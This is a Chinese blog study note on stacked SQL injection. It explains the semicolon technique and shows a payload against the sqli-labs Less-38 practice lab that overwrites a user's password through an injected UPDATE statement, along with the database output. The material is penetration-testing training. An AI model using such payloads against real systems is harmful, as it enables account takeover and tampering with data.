学习笔记-渗透测试-SQL注入_011_堆叠注
1 攻击原理
SQL语句允许堆叠执行多条语句,多条语句使用分号隔开,堆叠注入攻击就是利用该特性
MariaDB [(none)]> select version();show databases;
+----------------+
| version() |
+----------------+
| 5.5.68-MariaDB |
+----------------+
1 row in set (0.00 sec)
+--------------------+
| Database |
+--------------------+
| information_schema |
| bWAPP |
| challenges |
| dvwa |
| mysql |
| performance_schema |
| security |
| test |
+--------------------+
8 rows in set (0.00 sec)
2 攻击案例
案例靶场 sqlilab Less-38
此类注入不会有数据回显点,所以建议进行用户操作
1';update users set password='123456' where username='Dumb';--+
MariaDB [security]> select * from users where username='Dumb';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | 123456 |
+----+----------+----------+
1 row in set (0.00 sec)
本文来自博客园,作者:kinghtxg,转载请注明原文链接:https://www.cnblogs.com/kinghtxg/articles/17158170.html